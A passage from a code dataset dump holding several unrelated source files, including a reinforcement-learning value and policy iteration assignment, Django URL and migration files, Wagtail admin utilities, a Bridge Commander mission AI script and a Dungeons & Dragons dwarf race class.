'zxzxzFLDg1')\r\n\t\tclick('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/HSQLDB_LayoutEdit_ForeignLanguage/TestCases/B_NamedFields/Create_GroupLayout1/AA3_CreateFlds3b.py","file_name":"AA3_CreateFlds3b.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"446871645","text":"# Names: Sofia McKerrow and Wenpeng Jiang\n# Student IDs: s3626804, s3674270\n\n### MDP Value Iteration and Policy Iteration\n### Acknowledgement: start-up codes were adapted with permission from Prof. Emma Brunskill of Stanford University\n\nimport numpy as np\nimport gym\nimport time\nimport rmit_rl_env\n\nnp.set_printoptions(precision=3)\n\n\"\"\"\nFor policy_evaluation, policy_improvement, policy_iteration and value_iteration,\nthe parameters P, nS, nA, gamma are defined as follows:\n\n\tP: nested dictionary\n\t\tFrom gym.core.Environment\n\t\tFor each pair of states in [1, nS] and actions in [1, nA], P[state][action] is a\n\t\ttuple of the form (probability, nextstate, reward, terminal) where\n\t\t\t- probability: float\n\t\t\t\tthe probability of transitioning from \"state\" to \"nextstate\" with \"action\"\n\t\t\t- nextstate: int\n\t\t\t\tdenotes the state we transition to (in range [0, nS - 1])\n\t\t\t- reward: int\n\t\t\t\teither 0 or 1, the reward for transitioning from \"state\" to\n\t\t\t\t\"nextstate\" with \"action\"\n\t\t\t- terminal: bool\n\t\t\t True when \"nextstate\" is a terminal state (hole or goal), False otherwise\n\tnS: int\n\t\tnumber of states in the environment\n\tnA: int\n\t\tnumber of actions in the environment\n\tgamma: float\n\t\tDiscount factor. Number in range [0, 1)\n\"\"\"\n\ndef policy_evaluation(P, nS, nA, policy, gamma=0.9, tol=1e-3):\n\t\"\"\"Evaluate the value function from a given policy.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\tpolicy: np.array[nS]\n\t\tThe policy to evaluate. Maps states to actions.\n\ttol: float\n\t\tTerminate policy evaluation when\n\t\t\tmax |value_function(s) - prev_value_function(s)| < tol\n\tReturns\n\t-------\n\tvalue_function: np.ndarray[nS]\n\t\tThe value function of the given policy, where value_function[s] is\n\t\tthe value of state s\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\t\n\twhile True:\n\t\told_value_function = np.copy(value_function)\n\n\t\t# iterate through each state\n\t\tfor state in range(nS):\n\t\t\tpolicy_action = policy[state]\n\t\t\t# calculate the value function under the policy\n\t\t\tvalue_function[state] = sum([prob * (reward + gamma * old_value_function[next_state]) \\\n\t\t\t\tfor prob, next_state, reward, terminal in P[state][policy_action]])\n\n\t\t# if values have converged, stop iterations\n\t\tif (np.sum((np.fabs(old_value_function - value_function))) <= tol):\n\t\t\tbreak\n\n\t############################\n\t\n\treturn value_function\n\ndef policy_improvement(P, nS, nA, value_from_policy, policy, gamma=0.9):\n\t\"\"\"Given the value function from policy improve the policy.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\tvalue_from_policy: np.ndarray\n\t\tThe value calculated from the policy\n\tpolicy: np.array\n\t\tThe previous policy.\n\n\tReturns\n\t-------\n\tnew_policy: np.ndarray[nS]\n\t\tAn array of integers. Each integer is the optimal action to take\n\t\tin that state according to the environment dynamics and the\n\t\tgiven value function.\n\t\"\"\"\n\n\tnew_policy = np.zeros(nS, dtype='int')\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\t# iterate through each state\n\tdef one_step_look_ahead(P, state, nA, value_from_policy, gamma=0.9):\n\t\taction_values = np.zeros(nA)\n\n\t\tfor action in range(nA):\n\t\t\tfor prob,next_state,reward,terminal in P[state][action]:\n\t\t\t\t#sum value of all possible state in with action\n\t\t\t\taction_values[action] += prob * (reward + (gamma * value_from_policy[next_state]))\n\t\treturn action_values\n\n\tfor state in range(nS):\n\t\t#one step look ahead\n\t\taction_values = one_step_look_ahead(P, state, nA, value_from_policy, gamma)\n\t\tnew_policy[state] = np.argmax(action_values)\n\t\n\t############################\n\t\n\treturn new_policy\n\n\ndef policy_iteration(P, nS, nA, gamma=0.9, tol=10e-3):\n\t\"\"\"Runs policy iteration.\n\n\tYou should call the policy_evaluation() and policy_improvement() methods to\n\timplement this method.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\ttol: float\n\t\ttol parameter used in policy_evaluation()\n\tReturns:\n\t----------\n\tvalue_function: np.ndarray[nS]\n\tpolicy: np.ndarray[nS]\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\tpolicy = np.zeros(nS, dtype=int)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\tmax_iterations = 100000\n\t\n\tfor i in range(max_iterations):\n\t\t# get state value function for policy\n\t\tvalue_function = policy_evaluation(P, nS, nA, policy, gamma, tol)\n\t\t# use the state value function to improve the policy\n\t\tnew_policy = policy_improvement(P, nS, nA, value_function, policy, gamma)\n\n\t\t# check if the policy has converged\n\t\tif (np.all(policy == new_policy)):\n\t\t\tprint ('Policy converged in %d iterations.' %(i+1))\n\t\t\tbreak\n\t\t\n\t\t# update the policy\n\t\tpolicy = new_policy\n\n\t############################\n\t\n\treturn value_function, policy\n\ndef value_iteration(P, nS, nA, gamma=0.9, tol=1e-3):\n\t\"\"\"\n\tLearn value function and policy by using value iteration method for a given\n\tgamma and environment.\n\n\tParameters:\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\ttol: float\n\t\tTerminate value iteration when\n\t\t\tmax |value_function(s) - prev_value_function(s)| < tol\n\tReturns:\n\t----------\n\tvalue_function: np.ndarray[nS]\n\tpolicy: np.ndarray[nS]\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\tpolicy = np.zeros(nS, dtype=int)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\tmax_iterations = 200000\n\t\n\tfor i in range(max_iterations):\n\t\t# stopping condition\n\t\tdelta = 0\n\n\t\t# iterate through each state\n\t\tfor state in range(nS):\n\t\t\tactions_values = np.zeros(nA)\n\n\t\t\t# loop over possible actions\n\t\t\tfor act in range(nA):\n\t\t\t\tfor prob, next_state, reward, done in P[state][act]:\n\t\t\t\t\t# use Bellman equation to get action values\n\t\t\t\t\tactions_values[act] += prob * (reward + gamma * value_function[next_state])\n\n\t\t\t# get the highest action value\n\t\t\tbest_action_value = max(actions_values)\n\n\t\t\t# get the biggest difference between best action value and the previous value function\n\t\t\tdelta = max(delta, abs(best_action_value - value_function[state]))\n\n\t\t\t# update value function for the current state\n\t\t\tvalue_function[state] = best_action_value\n\n\t\t\t# update the policy based on the best action\n\t\t\tbest_action = np.argmax(actions_values)\n\t\t\tpolicy[state] = best_action\n\t\t\n\t\t# check if the values have reached convergence -> iterations can stop\n\t\tif delta < tol * (1 - gamma) / gamma:\n\t\t\tprint ('Value iteration converged in %d iterations.' %(i+1))\n\t\t\tbreak\n\n\t############################\n\n\treturn value_function, policy\n\ndef render_single(env, policy, max_steps=100):\n \"\"\"\n This function does not need to be modified\n Renders policy once on environment. Watch your agent play!\n\n Parameters\n ----------\n env: gym.core.Environment\n Environment to play on. Must have nS, nA, and P as\n attributes.\n Policy: np.array of shape [env.nS]\n The action to take at a given state\n \"\"\"\n\n episode_reward = 0\n ob = env.reset()\n for t in range(max_steps):\n env.render()\n time.sleep(0.25)\n a = policy[ob]\n ob, rew, done, _ = env.step(a)\n episode_reward += rew\n if done:\n break\n env.render();\n if not done:\n print(\"The agent didn't reach a terminal state in {} steps.\".format(max_steps))\n else:\n \tprint(\"Episode reward: %f\" % episode_reward)\n\n\n# Edit below to run policy and value iteration on different environments and\n# visualize the resulting policies in action!\n# You may change the parameters in the functions below\nif __name__ == \"__main__\":\n\n\t# comment/uncomment these lines to switch between deterministic/stochastic environments\n\t# env = gym.make(\"Deterministic-4x4-FrozenLake-v0\")\n\tenv = gym.make(\"Stochastic-4x4-FrozenLake-v0\")\n\n\tprint(\"\\n\" + \"-\"*25 + \"\\nBeginning Policy Iteration\\n\" + \"-\"*25)\n\n\tV_pi, p_pi = policy_iteration(env.P, env.nS, env.nA, gamma=0.9, tol=1e-3)\n\trender_single(env, p_pi, 100)\n\n\tprint(\"\\n\" + \"-\"*25 + \"\\nBeginning Value Iteration\\n\" + \"-\"*25)\n\n\tV_vi, p_vi = value_iteration(env.P, env.nS, env.nA, gamma=0.9, tol=1e-3)\n\trender_single(env, p_vi, 100)\n\n\n","sub_path":"vi_and_pi.py","file_name":"vi_and_pi.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"163631869","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'employee'\n\n#views.py기능과 url연결\nurlpatterns = [\n path('',employee_all, name='employee_all'),\n path('new/',new_feed, name='new_feed'),\n path('feed//', detail_feed),\n path('feed//remove/', remove_feed),\n path('feed//edit/', edit_feed),\n path('home/', sort1, name='home'),\n path('load/',sort2, name='load'),\n path('pet/',sort3, name='pet'),\n path('acting/',sort4, name='acting'),\n path('short/',sort5, name='short'),\n path('carpool/',sort6, name='carpool'),\n path('etc/',sort7, name='etc'),\n]\n\n","sub_path":"employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"520705162","text":"import math\n\ndef isPrime(n):\n i = 2\n while i <= math.sqrt(n):\n if n % i == 0:\n return False\n i += 1\n return True\n \ndef isCarmichael(n):\n if isPrime(n):\n return False\n for i in range(1, n):\n if i**n % n == i:\n continue\n else:\n return False\n return True\n\ndef main():\n n = int(input('Enter n: '))\n count = -1\n curr = 0\n while count < n:\n curr += 1\n if isCarmichael(curr):\n count += 1\n print(curr)\n\nmain()\n","sub_path":"Carmichael Numbers/carmichael.py","file_name":"carmichael.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"226208966","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport geoposition.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Descriptions',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField()),\n ('type', models.CharField(max_length=200)),\n ('language', models.CharField(max_length=200, choices=[(b'en', b'English'), (b'ru', b'Russian'), (b'gr', b'Greek')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Extraattrs',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=200)),\n ('type', models.CharField(max_length=200)),\n ('language', models.CharField(max_length=200, choices=[(b'en', b'English'), (b'ru', b'Russian'), (b'gr', b'Greek')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='House',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('sku', models.CharField(max_length=200)),\n ('name', models.CharField(max_length=200)),\n ('square_meters', models.CharField(max_length=200)),\n ('bedrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('bathrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('livingrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('storage', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('levels', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('balconi', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('energy_class', models.CharField(max_length=200, choices=[(b'A', b'A'), (b'B', b'B'), (b'C', b'C'), (b'E', b'E')])),\n ('barbeque', models.BooleanField(default=False)),\n ('pool', models.BooleanField(default=False)),\n ('security_system', models.BooleanField(default=False)),\n ('inner_stairs', models.BooleanField(default=False)),\n ('outer_stairs', models.BooleanField(default=False)),\n ('garden_stairs', models.BooleanField(default=False)),\n ('security_system_info', models.TextField()),\n ('ouside_short_info', models.TextField()),\n ('ouside_short_info_de', models.TextField(null=True)),\n ('ouside_short_info_en', models.TextField(null=True)),\n ('ouside_short_info_el', models.TextField(null=True)),\n ('inside_short_info', models.TextField()),\n ('garden_area_info', models.TextField()),\n ('location', geoposition.fields.GeopositionField(max_length=42)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField()),\n ('image', models.ImageField(upload_to=b'PhotoGallery')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PhotoGallery',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Price',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('type', models.CharField(max_length=200)),\n ('value', models.CharField(max_length=200)),\n ('per_sqrm', models.CharField(max_length=200)),\n ('start_date', models.CharField(max_length=200)),\n ('end_date', models.CharField(max_length=200)),\n ('currency', models.CharField(max_length=200, choices=[(b'dollar', b'$'), (b'pound', b'POUND'), (b'euro', b'EURO')])),\n ('property', models.ForeignKey(to='houses.House')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='photo',\n name='photoGallery',\n field=models.ForeignKey(to='houses.PhotoGallery'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='extraattrs',\n name='property',\n field=models.ForeignKey(to='houses.House'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='descriptions',\n name='photoGallery',\n field=models.ForeignKey(to='houses.PhotoGallery'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='descriptions',\n name='property',\n field=models.ForeignKey(to='houses.House'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='descriptions',\n unique_together=set([('property', 'type', 'language')]),\n ),\n ]\n","sub_path":"houses/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"395490413","text":"# To convert the interpro output to uniprot retrieve id list\n\nFILE = \"AAA_interpro.txt\"\nOUT = \"AAA_uniprot.txt\"\n\noutfile = open(OUT,'w')\n\nwith open(FILE) as file:\n for line in file.readlines():\n line = line.strip().split('\\t')\n id_acc,pos = line[0],line[-1]\n for p in pos.split(','):\n p = p.replace('..','-')\n outfile.write(f'{id_acc}[{p}]\\n')","sub_path":"Article-20210106/get_AAA/process_interpro_output.py","file_name":"process_interpro_output.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"415909456","text":"import App\ndef CreateAI(pShip, pTargetGroup):\n\n\t#########################################\n\t# Creating PlainAI WarpToSavoy3 at (65, 182)\n\tpWarpToSavoy3 = App.PlainAI_Create(pShip, \"WarpToSavoy3\")\n\tpWarpToSavoy3.SetScriptModule(\"Warp\")\n\tpWarpToSavoy3.SetInterruptable(1)\n\tpScript = pWarpToSavoy3.GetScriptInstance()\n\tpScript.SetDestinationSetName(\"Systems.Savoy.Savoy3\")\n\tpScript.SetDestinationPlacementName(\"VentureEnter\")\n\t# Done creating PlainAI WarpToSavoy3\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI NotInSavoy3 at (64, 262)\n\t## Conditions:\n\t#### Condition InSavoy3\n\tpInSavoy3 = App.ConditionScript_Create(\"Conditions.ConditionInSet\", \"ConditionInSet\", pShip.GetName(), \"Savoy3\")\n\t## Evaluation function:\n\tdef EvalFunc(bInSavoy3):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bInSavoy3):\n\t\t\treturn DONE\n\t\treturn ACTIVE\n\t## The ConditionalAI:\n\tpNotInSavoy3 = App.ConditionalAI_Create(pShip, \"NotInSavoy3\")\n\tpNotInSavoy3.SetInterruptable(1)\n\tpNotInSavoy3.SetContainedAI(pWarpToSavoy3)\n\tpNotInSavoy3.AddCondition(pInSavoy3)\n\tpNotInSavoy3.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI NotInSavoy3\n\t#########################################\n\t#########################################\n\t# Creating PlainAI Call_VentureTakingDamage at (166, 181)\n\tpCall_VentureTakingDamage = App.PlainAI_Create(pShip, \"Call_VentureTakingDamage\")\n\tpCall_VentureTakingDamage.SetScriptModule(\"RunScript\")\n\tpCall_VentureTakingDamage.SetInterruptable(1)\n\tpScript = pCall_VentureTakingDamage.GetScriptInstance()\n\tpScript.SetScriptModule(\"Maelstrom.Episode6.E6M1.E6M1\")\n\tpScript.SetFunction(\"VentureTakingDamage\")\n\t# Done creating PlainAI Call_VentureTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI HullTakingDamage at (163, 263)\n\t## Conditions:\n\t#### Condition HullAt80\n\tpHullAt80 = App.ConditionScript_Create(\"Conditions.ConditionSystemBelow\", \"ConditionSystemBelow\", pShip.GetName(), App.CT_HULL_SUBSYSTEM, 0.80)\n\t## Evaluation function:\n\tdef EvalFunc(bHullAt80):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bHullAt80):\n\t\t\treturn ACTIVE\n\t\treturn DORMANT\n\t## The ConditionalAI:\n\tpHullTakingDamage = App.ConditionalAI_Create(pShip, \"HullTakingDamage\")\n\tpHullTakingDamage.SetInterruptable(1)\n\tpHullTakingDamage.SetContainedAI(pCall_VentureTakingDamage)\n\tpHullTakingDamage.AddCondition(pHullAt80)\n\tpHullTakingDamage.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI HullTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttackAllTargets at (270, 266)\n\timport AI.Compound.BasicAttack\n\tpBasicAttackAllTargets = AI.Compound.BasicAttack.CreateAI(pShip, pTargetGroup, Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttackAllTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (104, 362)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (194, 357)\n\tpPriorityList.AddAI(pNotInSavoy3, 1)\n\tpPriorityList.AddAI(pHullTakingDamage, 2)\n\tpPriorityList.AddAI(pBasicAttackAllTargets, 3)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (11, 356)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode6/E6M1/E6M1_AI_Venture_Savoy3.py","file_name":"E6M1_AI_Venture_Savoy3.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6021059","text":"from __future__ import absolute_import, unicode_literals\n\nimport logging\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.mail import send_mail as django_send_mail\nfrom django.db.models import Count, Q\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\nfrom modelcluster.fields import ParentalKey\nfrom taggit.models import Tag\n\nfrom wagtail.wagtailcore.models import GroupPagePermission, Page, PageRevision\nfrom wagtail.wagtailusers.models import UserProfile\n\nlogger = logging.getLogger('wagtail.admin')\n\n\ndef get_object_usage(obj):\n \"Returns a queryset of pages that link to a particular object\"\n\n pages = Page.objects.none()\n\n # get all the relation objects for obj\n relations = [f for f in type(obj)._meta.get_fields(include_hidden=True)\n if (f.one_to_many or f.one_to_one) and f.auto_created]\n for relation in relations:\n related_model = relation.related_model\n\n # if the relation is between obj and a page, get the page\n if issubclass(related_model, Page):\n pages |= Page.objects.filter(\n id__in=related_model._base_manager.filter(**{\n relation.field.name: obj.id\n }).values_list('id', flat=True)\n )\n else:\n # if the relation is between obj and an object that has a page as a\n # property, return the page\n for f in related_model._meta.fields:\n if isinstance(f, ParentalKey) and issubclass(f.rel.to, Page):\n pages |= Page.objects.filter(\n id__in=related_model._base_manager.filter(\n **{\n relation.field.name: obj.id\n }).values_list(f.attname, flat=True)\n )\n\n return pages\n\n\ndef popular_tags_for_model(model, count=10):\n \"\"\"Return a queryset of the most frequently used tags used on this model class\"\"\"\n content_type = ContentType.objects.get_for_model(model)\n return Tag.objects.filter(\n taggit_taggeditem_items__content_type=content_type\n ).annotate(\n item_count=Count('taggit_taggeditem_items')\n ).order_by('-item_count')[:count]\n\n\ndef users_with_page_permission(page, permission_type, include_superusers=True):\n # Get user model\n User = get_user_model()\n\n # Find GroupPagePermission records of the given type that apply to this page or an ancestor\n ancestors_and_self = list(page.get_ancestors()) + [page]\n perm = GroupPagePermission.objects.filter(permission_type=permission_type, page__in=ancestors_and_self)\n q = Q(groups__page_permissions__in=perm)\n\n # Include superusers\n if include_superusers:\n q |= Q(is_superuser=True)\n\n return User.objects.filter(is_active=True).filter(q).distinct()\n\n\ndef permission_denied(request):\n \"\"\"Return a standard 'permission denied' response\"\"\"\n from wagtail.wagtailadmin import messages\n\n messages.error(request, _('Sorry, you do not have permission to access this area.'))\n return redirect('wagtailadmin_home')\n\n\ndef user_passes_test(test):\n \"\"\"\n Given a test function that takes a user object and returns a boolean,\n return a view decorator that denies access to the user if the test returns false.\n \"\"\"\n def decorator(view_func):\n # decorator takes the view function, and returns the view wrapped in\n # a permission check\n\n @wraps(view_func)\n def wrapped_view_func(request, *args, **kwargs):\n if test(request.user):\n # permission check succeeds; run the view function as normal\n return view_func(request, *args, **kwargs)\n else:\n # permission check failed\n return permission_denied(request)\n\n return wrapped_view_func\n\n return decorator\n\n\ndef permission_required(permission_name):\n \"\"\"\n Replacement for django.contrib.auth.decorators.permission_required which returns a\n more meaningful 'permission denied' response than just redirecting to the login page.\n (The latter doesn't work anyway because Wagtail doesn't define LOGIN_URL...)\n \"\"\"\n def test(user):\n return user.has_perm(permission_name)\n\n # user_passes_test constructs a decorator function specific to the above test function\n return user_passes_test(test)\n\n\ndef any_permission_required(*perms):\n \"\"\"\n Decorator that accepts a list of permission names, and allows the user\n to pass if they have *any* of the permissions in the list\n \"\"\"\n def test(user):\n for perm in perms:\n if user.has_perm(perm):\n return True\n\n return False\n\n return user_passes_test(test)\n\n\nclass PermissionPolicyChecker(object):\n \"\"\"\n Provides a view decorator that enforces the given permission policy,\n returning the wagtailadmin 'permission denied' response if permission not granted\n \"\"\"\n def __init__(self, policy):\n self.policy = policy\n\n def require(self, action):\n def test(user):\n return self.policy.user_has_permission(user, action)\n\n return user_passes_test(test)\n\n def require_any(self, *actions):\n def test(user):\n return self.policy.user_has_any_permission(user, actions)\n\n return user_passes_test(test)\n\n\ndef send_mail(subject, message, recipient_list, from_email=None, **kwargs):\n if not from_email:\n if hasattr(settings, 'WAGTAILADMIN_NOTIFICATION_FROM_EMAIL'):\n from_email = settings.WAGTAILADMIN_NOTIFICATION_FROM_EMAIL\n elif hasattr(settings, 'DEFAULT_FROM_EMAIL'):\n from_email = settings.DEFAULT_FROM_EMAIL\n else:\n from_email = 'webmaster@localhost'\n\n return django_send_mail(subject, message, from_email, recipient_list, **kwargs)\n\n\ndef send_notification(page_revision_id, notification, excluded_user_id):\n # Get revision\n revision = PageRevision.objects.get(id=page_revision_id)\n\n # Get list of recipients\n if notification == 'submitted':\n # Get list of publishers\n recipients = users_with_page_permission(revision.page, 'publish')\n elif notification in ['rejected', 'approved']:\n # Get submitter\n recipients = [revision.user]\n else:\n return False\n\n # Get list of email addresses\n email_recipients = [\n recipient for recipient in recipients\n if recipient.email and recipient.pk != excluded_user_id and getattr(\n UserProfile.get_for_user(recipient),\n notification + '_notifications'\n )\n ]\n\n # Return if there are no email addresses\n if not email_recipients:\n return True\n\n # Get template\n template_subject = 'wagtailadmin/notifications/' + notification + '_subject.txt'\n template_text = 'wagtailadmin/notifications/' + notification + '.txt'\n template_html = 'wagtailadmin/notifications/' + notification + '.html'\n\n # Common context to template\n context = {\n \"revision\": revision,\n \"settings\": settings,\n }\n\n # Send emails\n sent_count = 0\n for recipient in email_recipients:\n try:\n # update context with this recipient\n context[\"user\"] = recipient\n\n # Get email subject and content\n email_subject = render_to_string(template_subject, context).strip()\n email_content = render_to_string(template_text, context).strip()\n\n kwargs = {}\n if getattr(settings, 'WAGTAILADMIN_NOTIFICATION_USE_HTML', False):\n kwargs['html_message'] = render_to_string(template_html, context)\n\n # Send email\n send_mail(email_subject, email_content, [recipient.email], **kwargs)\n sent_count += 1\n except Exception:\n logger.exception(\n \"Failed to send notification email '%s' to %s\",\n email_subject, recipient.email\n )\n\n return sent_count == len(email_recipients)\n","sub_path":"wagtail/wagtailadmin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"66362733","text":"#!/usr/bin/env python\n\nfrom alpha_vantage.cryptocurrencies import CryptoCurrencies\nimport pandas as pd\nimport datetime\n\ncc = CryptoCurrencies(key='DD47SAS6ASI0WQFD', output_format='pandas')\n\noriginal_data, meta_data = cc.get_digital_currency_daily(symbol='BTC', market='USD')\n\n## Data agg per week (Monday to Sunday):\n\n# for readibility purposes, use dataframe (df) instead of data\ndf = original_data.copy()\n\n# Prepare the datetime to be indexed for the avg reduction\ndf[\"datetime\"] = pd.to_datetime(df.index, format='%Y-%m-%d %H:%M:%S')\ndf[\"date_minus_time\"] = df[\"datetime\"].apply(lambda x: datetime.datetime(year=x.year, month=x.month, day=x.day))\n\n# Change the index\ndf.set_index(df[\"date_minus_time\"], inplace=True)\n\n# Resample the data with the weekly averages\ndfmean = df.groupby(pd.Grouper(key='date_minus_time', freq='W-MON', closed='left', label='left'))['4a. close (USD)'].mean()\ndfmean.to_csv('output/USD_BTC_WEEK_MEAN.csv')\n\n# Relative span\ndfminmax = df.groupby(pd.Grouper(key='date_minus_time', freq='W-MON', closed='left', label='left'))['4a. close (USD)'].agg(['min', 'max'])\ndfminmax['weekly span'] = ((dfminmax.max - dfminmax.min)/dfminmax.min)\ndfminmax.sort_values(by=['weekly span'], ascending=False)\ndfmean.to_csv('output/USD_BTC_WEEKLY_SPAN.csv')\n","sub_path":"letsgetrich.py","file_name":"letsgetrich.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"649766439","text":"import Races.Race as r\nimport Stats as s\n\ndef chooseToolProficiency(toolName: str = \"empty\") -> str:\n toolName = toolName.lower()\n if(toolName == \"smith's tools\" or toolName == \"brewer's supplies\" or toolName == \"mason's tools\"):\n return toolName\n else:\n print(\"Choose from the following tools:\")\n toolname = str(input(\"smith's tools; brewer's supplies; or mason's tools: \"))\n chooseToolProficiency(toolname)\n\n\nclass Dwarf(r.Race):\n def __init__(self, age: int=50, alignment: str=\"lawful good\",\n height: int=48, stats: s.Stats=s.Stats(),\n subrace: str=\"hill\", weight: int=150,\n gender: str=\"male\", firstName: str=\"Adrik\",\n lastName: str=\"Balderk\"):\n super().__init__(\"dwarf\", age, alignment, height,\n \"common dwarvish\", \"medium\", stats, 25,\n subrace, weight, gender, firstName,\n lastName)\n self.darkvision = 60\n self.featuresAndTraits = [\"dwarven resilience: You have advantage on saving throws against poison, and you have resistance against poison damage.\"]\n tp = \"tool proficiency: \" + str(chooseToolProficiency())\n self.otherProficiencies = [\"dwarven combat training: You have proficiency with the battleaxe, handaxe, throwing hammer, and warhammer.\",\n tp,\n \"stonecunning: Whenever you make an Intelligence (History) check related to the origin of stone work, you are considered proficient in the History skill and add double your proficiency bonus to the check, instead of your normal proficiency bonus.\"]\n if(subrace == \"mountain\"):\n self.otherProficiencies.append(\"dwarven armor training: You have proficiency with light and medium armor.\")\n\n\n#//----------// //----------// //----------//\n# Other methods associatied with the Dwarf race\n#//----------// //----------// //----------//\n def 